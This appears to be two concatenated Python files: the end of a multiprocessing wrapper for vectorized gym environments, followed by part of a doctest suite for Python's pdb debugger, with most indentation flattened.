# TODO: close envs?
return
elif method == 'reset':
self._clear_state()
observation_m = [env.reset() for env in self.env_m]
self._child_send(observation_m)
elif method == 'step':
action_m = body
observation_m, reward_m, done_m, info = self.step_m(action_m)
self._child_send((observation_m, reward_m, done_m, info))
elif method == 'mask':
i = body
assert 0 <= i < self.m, 'Bad value for mask: {} (should be >= 0 and < {})'.format(i, self.m)
self.mask[i] = False
logger.debug('[%d] Applying mask: i=%d', self.worker_idx, i)
elif method == 'seed':
seeds = body
[env.seed(seed) for env, seed in zip(self.env_m, seeds)]
elif method == 'render':
mode, close = body
if mode == 'human':
self.env_m[0].render(mode=mode, close=close)
result = [None]
else:
result = [env.render(mode=mode, close=close) for env in self.env_m]
self._child_send(result)
else:
raise Error('Bad method: {}'.format(method))
def step_m(self, action_m):
observation_m = []
reward_m = []
done_m = []
info = {'m': []}
for env, enabled, action in zip(self.env_m, self.mask, action_m):
if enabled:
observation, reward, done, info_i = env.step(action)
if done:
observation = env.reset()
else:
observation = None
reward = 0
done = False
info_i = {}
observation_m.append(observation)
reward_m.append(reward)
done_m.append(done)
info['m'].append(info_i)
return observation_m, reward_m, done_m, info
def step_n(worker_n, action_n):
accumulated = 0
for worker in worker_n:
action_m = action_n[accumulated:accumulated+worker.m]
worker.step_start(action_m)
accumulated += worker.m
observation_n = []
reward_n = []
done_n = []
info = {'n': []}
for worker in worker_n:
observation_m, reward_m, done_m, info_i = worker.step_finish()
observation_n += observation_m
reward_n += reward_m
done_n += done_m
info['n'] += info_i['m']
return observation_n, reward_n, done_n, info
def reset_n(worker_n):
for worker in worker_n:
worker.reset_start()
observation_n = []
for worker in worker_n:
observation_n += worker.reset_finish()
return observation_n
def seed_n(worker_n, seed_n):
accumulated = 0
for worker in worker_n:
        seed_m = seed_n[accumulated:accumulated+worker.m]
        worker.seed_start(seed_m)
accumulated += worker.m
def mask(worker_n, i):
accumulated = 0
for k, worker in enumerate(worker_n):
if accumulated + worker.m <= i:
accumulated += worker.m
else:
worker.mask_start(i - accumulated)
return
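# Illustration (not in the original source): with two workers of m=3 each,
# mask(worker_n, 4) skips the first worker (global indices 0-2) and calls
# worker_n[1].mask_start(1), i.e. global index 4 maps to local index 1 in the
# second worker.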
def render_n(worker_n, mode, close):
if mode == 'human':
# Only render 1 worker
        worker_n = worker_n[0:1]
for worker in worker_n:
worker.render_start(mode, close)
res = []
for worker in worker_n:
res += worker.render_finish()
if mode != 'human':
return res
else:
return None
def close_n(worker_n):
if worker_n is None:
return
# TODO: better error handling: workers should die when we go away
# anyway. Also technically should wait for these processes if
# we're not crashing.
for worker in worker_n:
try:
worker.close_start()
except Error:
pass
# for worker in worker_n:
# try:
# worker.close_finish()
# except Error:
# pass
class MultiprocessingEnv(core.Env):
metadata = {
'runtime.vectorized': True,
}
def __init__(self, env_id):
self.worker_n = None
# Pull the relevant info from a transient env instance
self.spec = gym.spec(env_id)
env = self.spec.make()
current_metadata = self.metadata
self.metadata = env.metadata.copy()
self.metadata.update(current_metadata)
self.action_space = env.action_space
self.observation_space = env.observation_space
self.reward_range = env.reward_range
def _configure(self, n=1, pool_size=None, episode_limit=None):
super(MultiprocessingEnv, self)._configure()
self.n = n
self.envs = [self.spec.make() for _ in range(self.n)]
if pool_size is None:
pool_size = min(len(self.envs), multiprocessing.cpu_count() - 1)
pool_size = max(1, pool_size)
self.worker_n = []
m = int((self.n + pool_size - 1) / pool_size)
for i in range(0, self.n, m):
envs = self.envs[i:i+m]
self.worker_n.append(Worker(envs, i))
if episode_limit is not None:
self._episode_id.episode_limit = episode_limit
def _seed(self, seed):
seed_n(self.worker_n, seed)
return [[seed_i] for seed_i in seed]
def _reset(self):
return reset_n(self.worker_n)
def _step(self, action_n):
return step_n(self.worker_n, action_n)
def _render(self, mode='human', close=False):
return render_n(self.worker_n, mode=mode, close=close)
def mask(self, i):
mask(self.worker_n, i)
def _close(self):
close_n(self.worker_n)
if __name__ == '__main__':
    # Smoke test. `make` is not defined in this module, so the class is
    # instantiated directly; n=10 matches the batch of 10 actions below.
    env_n = MultiprocessingEnv('Pong-v3')
    env_n.configure(n=10)
    env_n.reset()
    print(env_n.step([0] * 10))
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
...     'source fooxxx',         # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
